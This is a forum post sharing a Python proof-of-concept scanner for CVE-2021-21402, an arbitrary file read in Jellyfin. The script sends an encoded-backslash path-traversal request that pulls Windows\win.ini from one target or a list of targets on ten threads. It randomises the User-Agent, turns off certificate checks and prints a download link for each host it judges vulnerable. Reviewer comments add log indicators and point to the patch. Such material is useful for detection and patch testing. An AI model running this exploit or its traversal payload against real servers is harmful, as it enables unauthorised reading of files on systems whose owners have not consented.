任意文件读取漏洞(CVE-2021-21402)

POC 任意文件读取漏洞(CVE-2021-21402)

Shacker已验证会员

Python:
import requests
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import random

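# check_vuln sends its probe with verify=False, so urllib3 would emit an
# InsecureRequestWarning on every HTTPS request; that warning is silenced here.
# NOTE(review): with certificate verification off, the identity of the
# responder is not checked, so a result only describes what some endpoint at
# that address returned.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# The list-file path is supplied by the -f/--file option parsed in the
# __main__ block. The previous `sys.argv[1]` read raised IndexError whenever
# the script was started without arguments, before argparse could run.
filename = None
# Targets read from the -f file; filled in by the __main__ block.
url_list=[]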

# Random User-Agent
def get_ua():
    """Return a randomly assembled desktop-Chrome User-Agent string.

    The Chrome major version is drawn from 55-62, the two trailing version
    fields from 0-3200 and 0-140, and the platform token from three fixed
    choices. Because the header differs on every call, the User-Agent is not
    a stable indicator for this script's traffic; the request path built in
    check_vuln is.
    """
    major = random.randint(55, 62)
    build = random.randint(0, 3200)
    patch = random.randint(0, 140)
    platforms = [
        '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
        '(Macintosh; Intel Mac OS X 10_12_6)'
    ]
    browser = 'Chrome/{}.0.{}.{}'.format(major, build, patch)

    # The platform is picked after the three version numbers, so the sequence
    # of draws from the random module stays the same.
    platform = random.choice(platforms)
    pieces = ('Mozilla/5.0', platform, 'AppleWebKit/537.36',
              '(KHTML, like Gecko)', browser, 'Safari/537.36')
    return ' '.join(pieces)

# Probe one host for the CVE-2021-21402 file-read behaviour
# (the original comment said "get version info"; no version is queried here)
def check_vuln(url):
    """Send one GET request and print whether the host looks affected.

    Only the scheme and host[:port] of *url* are used; any path or query the
    caller supplied is dropped. The probe asks for Windows\\win.ini through
    encoded-backslash traversal under /Audio/1/hls/ and reports a hit when the
    response is HTTP 200 and its body contains both "font" and "file".

    Reviewer notes:
    - CVE-2021-21402 is publicly catalogued as a Jellyfin file-read issue on
      Windows hosts (confirm against the vendor advisory). The fix is to
      upgrade to a release that includes the vendor patch.
    - In server or proxy logs the probe appears as a request under
      /Audio/.../hls/ whose path contains `..%5C` sequences and ends in
      /stream.mp3/. The User-Agent is randomised, so match on the path.
    - The two-substring test is a loose heuristic: any 200 page containing
      both words is reported as vulnerable.
    - Every exception, not only a timeout, is reported as "is timeout".
    - verify=False disables certificate checking for the request.
    """
    parts = parse.urlparse(url)
    base = parts.scheme + '://' + parts.netloc
    probe = parts.scheme + '://' + parts.netloc + '/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/'
    try:
        reply = requests.get(probe, headers={'User-Agent': get_ua()}, timeout=10, verify=False)
        # Short-circuit order kept: the body is only inspected on a 200.
        looks_like_ini = reply.status_code == 200 and "font" in reply.text and "file" in reply.text
        if not looks_like_ini:
            print("\033[31m[-]%s is no vulnerable\033[0m" %base)
        else:
            print("\033[32m[+]%s is vulnerable\nDownload link:%s\033[0m" %(base,probe))
    except Exception:
        # Broad catch: connection errors, TLS failures and timeouts all land here.
        print ("[-]%s is timeout\033[0m" %base)

# Thread-pool fan-out
def multithreading(url_list, pools=5):
    """Run check_vuln once for every entry of *url_list* on a thread pool.

    Args:
        url_list: iterable of target URLs; it is copied before use.
        pools: value passed to threadpool.ThreadPool (default 5).

    The call returns after pool.wait() does. Results are printed by
    check_vuln; nothing is returned.
    """
    targets = list(url_list)
    workers = threadpool.ThreadPool(pools)
    jobs = threadpool.makeRequests(check_vuln, targets)
    for job in jobs:
        workers.putRequest(job)
    workers.wait()

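if __name__ == '__main__':
    # Start-up banner; a raw string so the backslashes in the ASCII art are
    # printed literally.
    show = r'''
 _____ _   _ _____       _____  _____  _____  __        _____  __    ___ _____  _____
/  __ \ | | |  ___|     / __  \|  _  |/ __  \/  |      / __  \/  |  /   |  _  |/ __  \
| /  \/ | | | |__ ______`' / /'| |/' |`' / /'`| |______`' / /'`| | / /| | |/' |`' / /'
| |   | | | |  __|______| / /  |  /| |  / /   | |______| / /   | |/ /_| |  /| |  / / 
| \__/\ \_/ / |___      ./ /___\ |_/ /./ /____| |_     ./ /____| |\___  \ |_/ /./ /___
 \____/\___/\____/      \_____/ \___/ \_____/\___/     \_____/\___/   |_/\___/ \_____/
                                                                                      
                                                                                                                                          
                                                  CVE-2021-21402 By m2
    '''
    print(show + '\n')
    arg=ArgumentParser(description='CVE-2021-21402 By m2')
    arg.add_argument("-u",
                        "--url",
                        help="Target URL; Example:http://ip:port")
    # The help text used to repeat "Target URL"; this option takes a file path.
    arg.add_argument("-f",
                        "--file",
                        help="File with one target URL per line; Example:url.txt")
    args=arg.parse_args()
    url=args.url
    filename=args.file
    start=time()
    # Exactly one of -u / -f selects a mode. With both or neither, no check
    # runs and only the elapsed-time line is printed.
    if url is not None and filename is None:
        check_vuln(url)
    elif url is None and filename is not None:
        # A context manager closes the list file; the bare open() leaked the handle.
        with open(filename) as target_file:
            for i in target_file:
                # Only the newline is stripped; blank lines become empty
                # entries and are still handed to check_vuln.
                i=i.replace('\n','')
                url_list.append(i)
        multithreading(url_list,10)
    end=time()
    # Message text: "task finished, elapsed <seconds>" (%d truncates to whole seconds).
    print('任务完成,用时%d' %(end-start))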
 